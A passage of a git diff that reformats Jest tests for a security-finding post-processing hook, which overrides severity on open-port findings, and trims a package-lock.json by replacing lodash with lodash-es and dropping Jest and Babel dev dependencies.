{ - port: 24, - state: "open" - } - }, - ] + const rules = [ + { + matches: { + anyOf: [ + { + category: "Open Port", + attributes: { + port: 22, + state: "open", + }, + }, + { + category: "Open Port", + attributes: { + port: 24, + state: "open", + }, + }, + ], + }, + override: { + severity: "high", + description: "Telnet is bad", + }, }, - override: { - severity: "high", - description: "Telnet is bad" - } - }] + ]; const getFindings = async () => findings; @@ -176,7 +182,7 @@ test("Should Not Duplicate Findings For Multiple Matching Rules", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, }, ]; @@ -189,15 +195,15 @@ test("Should Not Duplicate Findings For Multiple Matching Rules", async () => { category: "Open Port", attributes: { port: 23, - state: "open" - } + state: "open", + }, }, - ] + ], }, override: { severity: "high", - description: "Telnet is bad" - } + description: "Telnet is bad", + }, }, { matches: { @@ -205,18 +211,18 @@ test("Should Not Duplicate Findings For Multiple Matching Rules", async () => { { category: "Open Port", attributes: { - state: "open" - } + state: "open", + }, }, - ] + ], }, override: { severity: "high", description: "Telnet is bad", - ticket: "Issue #33" - } - } - ] + ticket: "Issue #33", + }, + }, + ]; const getFindings = async () => findings; @@ -228,20 +234,21 @@ test("Should Not Duplicate Findings For Multiple Matching Rules", async () => { rules: rules, }); - const expected = [{ - category: "Open Port", - attributes: { - port: 23, - hostname: "foobar.com", - state: "open" + const expected = [ + { + category: "Open Port", + attributes: { + port: 23, + hostname: "foobar.com", + state: "open", + }, + severity: "high", + description: "Telnet is bad", + ticket: "Issue #33", }, - severity: "high", - description: "Telnet is bad", - ticket: "Issue #33" - }] + ]; expect(updateFindings).toBeCalledWith(expected); - }); test("Should Update Nested Attributes", async () => { @@ -251,32 +258,34 @@ test("Should Update Nested Attributes", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, }, ]; - const rules = [{ - matches: { - anyOf: [ - { - category: "Open Port", - attributes: { - port: 23, - state: "open" - } + const rules = [ + { + matches: { + anyOf: [ + { + category: "Open Port", + attributes: { + port: 23, + state: "open", + }, + }, + ], + }, + override: { + severity: "high", + attributes: { + hostname: "foo.bar", + port: 42, }, - ] - }, - override: { - severity: "high", - attributes: { - hostname: "foo.bar", - port: 42, + description: "Telnet is bad", }, - description: "Telnet is bad" - } - }] + }, + ]; const getFindings = async () => findings; @@ -294,13 +303,12 @@ test("Should Update Nested Attributes", async () => { attributes: { hostname: "foo.bar", port: 42, - state: "open" + state: "open", }, severity: "high", - description: "Telnet is bad" - } + description: "Telnet is bad", + }, ]); - }); test("Should Not Update Findings If No Rule Matches", async () => { @@ -310,32 +318,34 @@ test("Should Not Update Findings If No Rule Matches", async () => { attributes: { hostname: "foobar.com", port: 22, - state: "open" + state: "open", }, }, ]; - const rules = [{ - matches: { - anyOf: [ - { - category: "Open Port", - attributes: { - port: 23, - state: "open" - } + const rules = [ + { + matches: { + anyOf: [ + { + category: "Open Port", + attributes: { + port: 23, + state: "open", + }, + }, + ], + }, + override: { + severity: "high", + attributes: { + hostname: "foo.bar", + port: 42, }, - ] - }, - override: { - severity: "high", - attributes: { - hostname: "foo.bar", - port: 42, + description: "Telnet is bad", }, - description: "Telnet is bad" - } - }] + }, + ]; const getFindings = async () => findings; @@ -357,7 +367,7 @@ test("Should Ignore Findings That Don't Match The Rule", async () => { attributes: { hostname: "foo.com", port: 22, - state: "open" + state: "open", }, }, { @@ -365,7 +375,7 @@ test("Should Ignore Findings That Don't Match The Rule", async () => { attributes: { hostname: "bar.com", port: 22, - state: "open" + state: "open", }, }, { @@ -373,32 +383,34 @@ test("Should Ignore Findings That Don't Match The Rule", async () => { attributes: { hostname: "foobar.com", port: 22, - state: "open" + state: "open", }, }, ]; - const rules = [{ - matches: { - anyOf: [ - { - category: "Open Port", - attributes: { - hostname: "foobar.com", - port: 22, - state: "open" - } + const rules = [ + { + matches: { + anyOf: [ + { + category: "Open Port", + attributes: { + hostname: "foobar.com", + port: 22, + state: "open", + }, + }, + ], + }, + override: { + severity: "high", + attributes: { + port: 42, }, - ] - }, - override: { - severity: "high", - attributes: { - port: 42, + description: "Foobar", }, - description: "Foobar" - } - }] + }, + ]; const getFindings = async () => findings; @@ -416,7 +428,7 @@ test("Should Ignore Findings That Don't Match The Rule", async () => { attributes: { hostname: "foo.com", port: 22, - state: "open" + state: "open", }, }, { @@ -424,7 +436,7 @@ test("Should Ignore Findings That Don't Match The Rule", async () => { attributes: { hostname: "bar.com", port: 22, - state: "open" + state: "open", }, }, { @@ -432,11 +444,10 @@ test("Should Ignore Findings That Don't Match The Rule", async () => { attributes: { hostname: "foobar.com", port: 42, - state: "open" + state: "open", }, severity: "high", description: "Foobar", - } + }, ]); - -}) +}); diff --git a/hooks/finding-post-processing/hook/package-lock.json b/hooks/finding-post-processing/hook/package-lock.json index c29ab9f657..6b0acb282f 100644 --- a/hooks/finding-post-processing/hook/package-lock.json +++ b/hooks/finding-post-processing/hook/package-lock.json @@ -9,6217 +9,22 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "lodash": "^4.17.21" + "lodash-es": "^4.17.21" }, - "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" - } + "devDependencies": {} }, - "node_modules/@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/code-frame/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/core/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", - "dev": true, - "dependencies": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "dependencies": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": 